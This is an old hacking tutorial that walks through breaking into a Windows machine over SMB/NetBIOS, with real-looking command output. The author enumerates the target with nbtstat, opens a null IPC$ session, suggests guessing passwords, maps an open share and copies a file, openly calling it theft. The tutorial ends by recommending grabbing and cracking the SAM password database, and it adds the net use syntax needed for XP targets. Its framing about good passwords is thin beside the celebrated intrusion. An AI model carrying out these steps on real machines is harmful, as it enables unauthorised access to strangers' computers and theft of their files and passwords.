Madirish Tutorial 09

30 November -0001
Ok, hopefully this will show you how important it is to a) choose a good logon password, and b) to password protect any shares you are using. Lets say through a network scan I find that the computer at 216.25.200.132 is a windows machine. I want to check and see if that machine is sharing anything, and if I can get the shares. Note: The IP addresses and names have been CHANGED to protect the vulnerable, lines in red are my comments, the rest is actual output from my session:

C:\>nbtstat -A 215.25.200.152

Local Area Connection 2:
Node IpAddress: [0.0.0.0] Scope Id: []

    Host not found.

Local Area Connection:
Node IpAddress: [215.25.200.135] Scope Id: []

           NetBIOS Remote Machine Name Table

       Name               Type         Status
    ---------------------------------------------
    NCARTER        <00>  UNIQUE      Registered
    SVNET          <00>  GROUP       Registered
    NCARTER        <20>  UNIQUE      Registered
    SVNET          <1E>  GROUP       Registered
    NCARTER        <03>  UNIQUE      Registered
    NCARTER        <1F>  UNIQUE      Registered

    MAC Address = 00-00-E8-9A-9E-12


\Device\NetBT_Tcpip_{7CD42A51-8B2F-4A5F-A42E-1C76F336D3DE}:
Node IpAddress: [215.25.200.140] Scope Id: []

           NetBIOS Remote Machine Name Table

       Name               Type         Status
    ---------------------------------------------
    NCARTER        <00>  UNIQUE      Registered
    SVNET          <00>  GROUP       Registered
    NCARTER        <20>  UNIQUE      Registered
    SVNET          <1E>  GROUP       Registered
    NCARTER        <03>  UNIQUE      Registered
    NCARTER        <1F>  UNIQUE      Registered

    MAC Address = 00-00-E8-9A-9E-12

Using this command I have found that the username on this computer is NCARTER, and the workgroup is SVNET. Now the fun begins:

C:\>net use \\215.25.200.152\ipc$ /user:ncarter
Local name
Remote name       \\215.25.200.152\ipc$
Resource type     IPC
Status            OK
# Opens           0
# Connections     1
The command completed successfully.

Ok, this is a bit simulated, usually you'll have to enter a password, but I got lucky here and there was no password in effect. If there had been a password you could issue 'net use \\215.25.200.152\ipc$ /user:ncarter PASSWORD' where PASSWORD = your guess as to thier password. Many systems will lock you out after 3 bad attempts, but you'd be surprised how many won't. What you're doing is trying to establish a null share connection.

C:\>net view \\215.25.200.152
Shared resources at \\215.25.200.152



Share name   Type         Used as  Comment

-------------------------------------------------------------------------------
HP COLOR     Print
MUSIC        Disk         
PUBLIC       Disk         
TOSEND       Disk
The command completed successfully.
Ok, now we know the names of the shares on this computer. Lets try to connect to the 'TOSEND' share:

C:\>net use u: \\215.25.200.152\tosend
The password is invalid for \\215.25.200.152\tosend.

Type the password for \\215.25.200.152\tosend:
System error 5 has occurred.

Access is denied.

No dice, its password protected, lets try the others:


C:\>net use y: \\215.25.200.152\public
The command completed successfully.

Bingo, we're in. Notice the y: in the 'net use' command? Thats the local drive name that we're going to use as a link to NCARTER.

C:\>net view \\215.25.200.152
Shared resources at \\215.25.200.152



Share name   Type         Used as  Comment

-------------------------------------------------------------------------------
HP COLOR     Print
MUSIC        Disk        
PUBLIC       Disk         Y:
TOSEND       Disk
The command completed successfully.

C:\>dir y:
 Volume in drive Y is HP_PAVILION
 Volume Serial Number is 1C68-0F0A

 Directory of Y:
04/26/2000  12:56p      <DIR>          .
04/26/2000  12:56p      <DIR>          ..
04/26/2000  11:57a                 331 Shortcut to Sawmill5.0.lnk
04/26/2000  12:58p              29,696 hits.doc
04/26/2000  01:33p             978,918 wtapi.pdf
04/26/2000  01:44p              19,456 USER TIMEOUT.doc
05/04/2000  02:34p              23,552 Letterhead.dot
11/15/2000  06:37p              20,480 Contact list.doc
07/24/2000  01:19p              87,040 Elegant Fax.doc
09/18/2000  12:38p           7,710,412 KingofPrussia000918.pdf
06/26/2000  04:28p      <DIR>          HP Drivers
09/18/2000  05:04p              15,906 cover.jpg
06/22/2000  12:33p      <DIR>          halflife update
06/02/2000  02:05p      <DIR>          School 
09/06/2000  02:40p      <DIR>          abae
01/29/2000  05:33p      <DIR>          Content
04/27/2000  02:21p      <DIR>          photos
05/23/2000  01:22p      <DIR>          delete_button
03/01/2001  02:12p      <DIR>          Firewall Docs
06/20/2000  03:28p      <DIR>          Install
06/27/2000  10:26a      <DIR>          HomePage
07/12/2000  02:12p                 463 Team Fortress Classic Manual.lnk
09/18/2000  10:54a          16,864,741 wtetrial.exe
10/26/2000  04:39p      <DIR>          Visor programs
11/29/2000  03:39p              26,112 TCS VS letter.doc
              12 File(s)     25,777,107 bytes
              13 Dir(s)   5,406,457,856 bytes free

C:\>copy y:\hits.doc
        1 file(s) copied.

C:\>dir hits*
 Volume in drive C has no label.
 Volume Serial Number is 94B4-57C0

 Directory of C:
04/26/2000  12:58p              29,696 hits.doc
               1 File(s)         29,696 bytes
               0 Dir(s)   2,796,068,864 bytes free

The rest of what I did should be pretty obvious. I stole a copy of hits.doc and moved it to my local C: drive. Notice how easy all of this was?!? If you're really lucky you'll get an NT machine and be able to copy the SAM database file and crack it to get a list of all the users AND their passwords. Enjoy

-------------------------------------------------------------------------------------------

The tutorial, unfortunately, describes the method to connect to Windows 98, Windows ME and Samba shares only. NT, 2000, and XP authenticate with a domain as well, so if you want to connect to an XP share you have to specify the domain in your username, for instance:

net use \\target.hostname.ext\ipc$ /USER:username@fulldomain.ext password

will allow you to connect to a null session on an XP machine. Its sort of a pain in the butt. To find your domain name you can either type

ipconfig /ALL

at the command line, or you can right click on your 'My Computer', select 'Properties' then click the 'Network Identification' tab.